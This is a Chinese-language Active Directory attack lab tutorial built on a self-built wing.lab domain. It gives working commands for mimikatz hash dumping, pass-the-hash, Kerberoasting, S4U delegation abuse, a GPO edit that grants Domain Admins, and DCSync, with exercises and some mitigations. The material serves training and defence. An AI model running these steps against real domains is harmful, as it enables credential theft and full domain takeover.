长亭百川云 - 文章详情

长亭百川云

技术讨论漏洞库IP 威胁情报在线工具

Active-Directory-Security-101

RedTeaming

50

2024-07-13

原文链接

前置知识

刚入门的小伙伴可以去京东或者淘宝购买这本书看一遍

  1. Windows Server 2012 R2 系统配置指南_戴有炜编著

文章是根据https://github.com/cfalta/adsec 改编。

环境搭建

https://github.com/cfalta/adsec/tree/main/lab-setup

  • DC2019-Windows 2019

  • user1-Windows 2019

  • user2-Windows 2019

配置域控

新增一个网卡,三个虚拟机使用这个网卡

设定指定ip

我是直接复制虚拟机,需要更改mac地址和sid。

还要更改sid
可以使用系统内置的工具sysprep或者另外一个newsid

工具https://newsid.softag.com/download

在三台机器上以管理员权限执行以下命令。

  • 关闭防火墙
  1. Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
  • 关闭Windows Defender
  1. Uninstall-WindowsFeature -Name Windows-Defender

下载自动化脚本辅助安装
https://github.com/cfalta/adsec/tree/main/lab-setup/domain-setup-scripts

运行createdomain脚本,自行修改里面的域名称。
这里应该不能一步完成
先执行

  1. Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools

重启后再继续执行。

重启后执行这个文件

功能就是根据json文件去自动添加用户和组等等。

配置域内机器

在两台成员机器上使用以下两个域账号注册

John Doe

john

P@ssw0rd

Bruce Lee

blee

TekkenIsAwesome!

user1这台用john认证

user2机器用blee登录

攻击机器准备

用john登录user1这台机器,当做入口点,再分配一张网卡,让他出网。
默认工具包下载地址
https://github.com/cfalta/adsec/blob/main/exercises/attacker-tools

bloodhound安装及配置

谷歌一下

信息收集

导入powerview模块

  1. cd C:\attacker-tools

  2. cat -raw ".\PowerView.ps1" | iex

获取当前域的基本信息和域控位置

  1. Get-Domain

  2. Get-DomainController

查看有多少电脑和域内用户

  1. Get-DomainComputer

  2. Get-DomainUser

过滤出域管出来

  1. Get-DomainUser | ? {$_.memberof -like "*Domain Admins*"}

  3. Get-DomainUser | ? {$_.memberof -like "*Domain Admins*"} | select samaccountname

课后习题

参考答案我会放在最后面哦

  1. 域中有多少台计算机以及它们在什么操作系统上运行?

  2. 域中有多少用户?编写一个 powershell 语句进行查询,以表格形式列出所有用户,仅显示属性 samaccountname、displayname、description 和最后一次密码更改的时间。

  3. 您能识别出哪些自定义的管理员组?以通用方式更改上面的 powershell 查询,使其仅返回自定义管理组。

  4. 找到对应管理员组的成员,这些用户上一次设置密码是什么时候?

  5. 有快速识别出域中服务帐户的简单方法吗?编写一个 powershell 查询,列出所有服务帐户。

NTLM的利用

  • mimikatz

  • psexec

需要管理员权限,使用本地administrator用户登录

  1. privilege::debug

  2. token::elevate

  3. lsadump::sam

获得到管理员hash
7dfa0531d73101ca080c7379a9bff1c7

pth攻击

  1. sekurlsa::pth /user:Administrator /ntlm:7dfa0531d73101ca080c7379a9bff1c7 /domain:wing.lab

  2. psexec.exe \\user2 cmd

课后习题

  1. mimikatz 执行"privilege::debug"和"token::elevate"的目的是什么?为什么需要执行它们?

  2. 以 Bruce Lee 的身份登录 user1。使用您在上面学到的知识帮助 john 从内存中远程提取 Bruce Lee的 NTLM 哈希。

  3. 如何尽可能的缓解PTH攻击,请讲清楚原因。

  4. 是否有可能(并且可行)完全禁用 NTLM?解释你的理由。

Kerberos-Roasting

预习资料域渗透——AS-REP Roasting
加载插件

  1. cd C:\attacker-tools

  2. cat -raw .\PowerView.ps1 | iex

  3. cat -raw .\Invoke-Rubeus.ps1 | iex

查询SPN,获得服务用户

  1. Get-DomainUser -SPN | select samaccountname, description, pwdlastset, serviceprincipalname

Rubeus有一个统计kerberos数据的功能

  1. Invoke-Rubeus -Command "kerberoast /stats"

获取目标账户的TGS

  1. Invoke-Rubeus -Command "kerberoast /user:taskservice /format:hashcat /outfile:krb5tgs.txt"

这里的脚本是base64之后通过powershell内存加载

  1. function Invoke-Rubeus([string]$Command)

  2. {

  3. $Message="base64";

  5. $Assembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Message))

  6. [Rubeus.Program]::Main($Command.Split(" "))

  7. }

破解TGS

  1. .\john.exe ..\..\krb5tgs.txt --wordlist=..\..\example.dict --rules=passphrase-rule2

课后习题

  1. 研究如何最好地减轻 kerberoasting 攻击。描述一下您认为最好的缓解技术,并解释其原因。

  2. 还有一个用户会受到ASREP roasting影响,请找出来。

  3. 解释一下TGS vs. ASREP roasting

Kerberos (Delegation)

之前设置的时候没改json里面的数据,要把domain改了

找到委派用户

  1. Get-DomainUser -TrustedToAuth

查看委派的目标

  1. Get-DomainUser -TrustedToAuth | select -ExpandProperty msds-allowedtodelegateto

执行这个攻击的条件就是要知道用户的密码才行
生成hash

  1. Invoke-Rubeus -Command "hash /password:Amsterdam2015 /domain:wing.lab /user:service1"

Rubeus允许我们在新的登录会话中启动powershell。这意味着我们伪造的票证只存在于这个登录会话中,不会干扰用户john已经存在的kerboers票证。

使用s4u请求一个TGS模拟域管理用户Bruce(bwillis)攻击user1。

我们请求3个不同服务的票证
CIFS将用于SMB访问
HOST/RPCSS用于WMI

  1. Invoke-Rubeus -Command "s4u /user:service1 /aes256:BE09389D798B17683B105FF6432BA4FD4785DA5A08BFD3F39328A6525433E073 /impersonateuser:bwillis /msdsspn:cifs/user1.wing.lab /ptt"

  2. Invoke-Rubeus -Command "s4u /user:service1 /aes256:BE09389D798B17683B105FF6432BA4FD4785DA5A08BFD3F39328A6525433E073 /impersonateuser:bwillis /msdsspn:host/user1.wing.lab /ptt"

  3. Invoke-Rubeus -Command "s4u /user:service1 /aes256:BE09389D798B17683B105FF6432BA4FD4785DA5A08BFD3F39328A6525433E073 /impersonateuser:bwillis /msdsspn:rpcss/user1.wing.lab /ptt"

查看缓存的票据
前面我设置错了,委派的目标应该设置成user2,user1是自己,不过意思都一样。

  1. ls \\user1.wing.lab\C$

通过wmi控制user1

  1. Get-WmiObject -Class win32_process -ComputerName adsec-01.contoso.com

课后习题

  1. 在上面的练习中,您通过SMB和WMI获得了对服务器user的读取权限。现在试着通过这两个协议来执行代码。目标是执行以下命令,将用户john添加到本地管理组

  2. 尝试模拟域管理员用户Chuck Norris而不是“Bruce Willis。有什么作用

ACL攻击

信息收集

  1. cat -raw .\SharpHound.ps1 | iex

  2. Invoke-Bloodhound -CollectionMethod DcOnly -Stealth -PrettyJson -NoSaveCache

  • CollectionMethod DcOnly表示仅从域控收集数据。从opsec的角度来看,这样比较好,因为是正常流量。

  • Stealth单线程启动。速度较慢,但安全。

  • PrettyJson 格式化.json文件。

  • NoSaveCache 不保存缓存文件。

启动血犬

下载社区版的neo4j
https://neo4j.com/download-center/#releases

  1. ❯ jdk11

  2. ❯ ./neo4j start

先把service1标记为已沦陷

点击这里

这里显示用户对域控的组策略有写入权限,通过组策略利用,攻击DC
需要先以service1的身份登录

  1. runas /user:wing.lab\service1 powershell

  2. .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author contoso\adminuser --Command "cmd.exe" --Arguments '/c net group \"Domain Admins\" john /ADD' --GPOName "Default Domain Controllers Policy" --force

写入完成以后,需要等管理员更新组策略才会触发。
手工弄一下。

提权成功

成功登录到域控

课后习题

  • acl攻击有哪些利用工具?

权限维持

权限维持的东西比较多

  • 金银票据

  • Mimikatz后门

  • 等等等等

一般拿到DC权限就先执行

  1. lsadump::dcsync /user:krbtgt

拿到所有用户hash,也可以作为后门。

课后习题

  • 自主学习这些权限维持方法的原理。

参考答案

我做的不一定对,有错误请留言。

信息收集

powerview3.0 tricks
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

  1. 域中有多少台计算机以及它们在什么操作系统上运行?

  2. 域中有多少用户?编写一个 powershell 语句进行查询,以表格形式列出所有用户,仅显示属性 samaccountname、displayname、description 和最后一次密码更改的时间。

  3. 您能识别出哪些自定义的管理员组?以通用方式更改上面的 powershell 查询,使其仅返回自定义管理组。

  4. Get-DomainGroupMember -Identity "Domain Admins" -Recurse

  5. 找到对应管理员组的成员,这些用户上一次设置密码是什么时候?

  6. 有快速识别出域中服务帐户的简单方法吗?编写一个 powershell 查询,列出所有服务帐户。

  7. Get-DomainUser -SPN|select serviceprincipalname,userprincipalname,pwdlastset,lastlogon

NTLM

猕猴桃命令大全

  1. mimikatz 执行"privilege::debug"和"token::elevate"的目的是什么?为什么需要执行它们?

  2. privilege::debug - 提升为管理员权限

  3. token::elevate - 伪造令牌,获得system权限或发现其他用户的令牌

  4. 以 Bruce Lee 的身份登录 user1。使用您在上面学到的知识帮助 john 从内存中远程提取 Bruce Lee的 NTLM 哈希。

  5. lsadump::dcsync /domain:wing.lab /user:bruce

  7. dump所有数据

  8. lsadump::dcsync /domain:wing.lab /all /csv

  9. 如何尽可能的缓解PTH攻击,请讲清楚原因。

  • 打上补丁kb2871997并且禁用SID=500的管理员用户

  • 监控日志

  1. 是否有可能(并且可行)完全禁用 NTLM?解释你的理由。

  • 审查收到的NTLM流量:启用对所有帐户的审查

  • 仅发送NTLMv2响应。拒绝LM&NTLM

第四点我不太确定。

Kerberos (Roasting)

  1. 研究如何最好地减轻 kerberoasting 攻击。描述一下您认为最好的缓解技术,并解释其原因。

  • 禁止用户开启 DonotrequireKerberospreauthentication

  • 禁止弱口令

  1. 还有一个用户会受到ASREP roasting影响,请找出来。

Get-DomainUser -PreauthNotRequired -Verbose

  1. 解释一下TGS vs. ASREP roasting

https://www.4hou.com/posts/YVyM

Kerberos (Delegation)

  1. 在上面的练习中,您通过SMB和WMI获得了对服务器user的读取权限。现在试着通过这两个协议来执行代码。目标是执行以下命令,将用户john添加到本地管理组:
  • psexec

  1. wmic /node:user1 process call create "cmd.exe /c net localgroup Administrators john /add"

  2. 尝试模拟域管理员用户Chuck Norris而不是“Bruce Willis。有什么作用?

可以攻击域控

ACL

acl攻击有哪些利用工具?

  • github.com

权限维持

  • 自主学习这些权限维持的原理。
相关推荐
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
漏洞库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服
Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2